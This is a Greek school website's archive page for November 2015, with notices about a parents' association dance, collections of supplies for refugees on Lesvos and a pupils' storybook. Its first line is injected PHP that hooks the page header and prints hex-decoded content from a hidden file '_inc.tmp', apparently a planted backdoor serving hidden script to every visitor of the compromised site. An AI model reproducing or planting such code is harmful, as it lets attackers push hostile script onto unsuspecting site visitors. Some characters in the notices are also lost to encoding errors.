if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Νοέμβριος, 2015 |

Monthly Archives: Νοέμβριος 2015

Χοροεσπερίδα Συλλόγου 21-Νοε-2015

Ζωντανή Μουσική με Έντεχνο και Λαϊκό πρόγραμμα. Ο Σύλλογος Γονέων και Κηδεμόνων του Δημοτικού Σχολείου Λεωνιδίου σας καλεί στην χοροεσπερίδα που διοργανώνει το Σάββατο 21 Νοεμβρίου 2015 στα Πούλιθρα στου Καλόπιτα. Θα γίνει κλήρωση με πλούσια δώρα.

Είσοδος: 3? (Με το εισητήριο λαμβάνετε μέρος στην κλήρωση για πλούσια δώρα).

Για κρατήσεις: τηλ.: 2757051271, κιν.: 6945596252

Συγκέντρωση ειδών πρώτης ανάγκης

Ο Δήμος Νότιας Κυνουρίας σε συνεργασία με το Διευθυντή και το διδακτικό προσωπικό του Δημοτικού Σχολείου Λεωνιδίου και τον Σύλλογο Γονέων του Δημοτικού Σχολείου, ανέλαβε να συγκεντρώσει είδη πρώτης ανάγκης για τους πρόσφυγες της νήσου Λέσβου και συγκεκριμένα για το Νοσοκομείο Λέσβου, όπου πηγαίνουν για να τους παρασχεθούν οι πρώτες βοήθειες.

Η ανταπόκριση του κόσμου υπήρξε τεράστια. Η συμβολή όλων των σχολείων, των Συλλόγων γονέων αλλά και πολλών άλλων ανθρώπων διαφόρων ηλικιών ήταν άκρως συγκινητική και πολύτιμη. Τα είδη που συγκεντρώθηκαν ήταν πάρα πολλά και την Κυριακή 15/11/2015 έγινε διαχωρισμός και τακτοποίηση αυτών σε κούτες. Οι εθελοντές για ακόμη μία φορά έδωσαν το παρών και βοήθησαν στη διαδικασία αυτή, ώστε όσο το δυνατόν γρηγορότερα να φύγουν τα πράγματα για Λέσβο.

Οι ανάγκες εκεί παραμένουν πολλές, πολλαπλασιάζονται μέρα με τη μέρα και κάθε λεπτό είναι πολύτιμο. Ας ελπίσουμε να είναι όλοι τους υγιείς και δυνατοί για ένα νέο ξεκίνημα στη ζωή τους με αξιοπρέπεια.

Ευχαριστούμε όλους όσους βοήθησαν με τον οποιοδήποτε τρόπο.

ΕΚ ΜΕΡΟΥΣ ΤΟΥ ΔΗΜΟΥ ΝΟΤΙΑΣ ΚΥΝΟΥΡΙΑΣ
Ρουσάλη Ευγενία

Ο Νάνος και τα διαμάντια

Ένα παραμύθι από τις μαθήτριες της Β τάξης του Δημοτικού Σχολείου Λεωνιδίου.

Book titled 'Ο νάνος και τα διαμάντια'Read this free book made on StoryJumper

Συγκέντρωση ειδών πρώτης ανάγκης για τους πρόσφυγες

Ο Δήμος Νότιας Κυνουρίας σε συνεργασία με το Δημοτικό Σχολείο Λεωνιδίου και τον Σύλλογο Γονέων και Κηδεμόνων, μετά από επικοινωνία με το Γενικό Νοσοκομείο Μυτιλήνης «ΒΟΣΤΑΝΕΙΟ» (Κυρία Σεβδαλή Μαρία τηλ: 22510 ? 24859), δηλώνουν και έμπρακτα την αμέριστη συμπαράσταση στον αγώνα επιβίωσης των συνανθρώπων μας. Καθημερινά καταφθάνουν στον τόπο μας άνθρωποι σε άθλια κατάσταση και ιδιαίτερα μικρά παιδιά που βιώνουν θλιβερές στιγμές, γι? αυτό και σας καλούμε να συγκεντρώσουμε βρεφικά και παιδικά είδη άμεσης ανάγκης.

Οι μεγαλύτερες ανάγκες εντοπίζονται στα παρακάτω είδη:
? Τρόφιμα ( παιδικές τροφές ? κρέμες ? βρεφικό γάλα ? γάλα εβαπορέ )
? Αδιάβροχα ? ομπρέλες ( για την προστασία τους από τις καιρικές συνθήκες μετά από το εξιτήριο )
? Εσώρουχα και κάλτσες ( για παιδιά και ενήλικες )
? Βραστήρες, μπιμπερό, πιπίλες, πάνες, μωρομάντηλα , παιδικές κουβέρτες, υπνόσακους και ό,τι πιστεύετε πως έχει ανάγκη ένα μωρό που ζει και μεγαλώνει στους δρόμους

Η συγκέντρωση των παραπάνω ειδών θα γίνεται στο Δημοτικό Σχολείο Λεωνιδίου από Δευτέρα 9 Νοεμβρίου 2015 έως Παρασκευή 13 Νοεμβρίου σε ώρες λειτουργίας του Σχολείου.

Εκ του Δήμου Νότιας Κυνουρίας,
του Δημοτικού Σχολείου Λεωνιδίου και
του Συλλόγου Γονέων και Κηδεμόνων.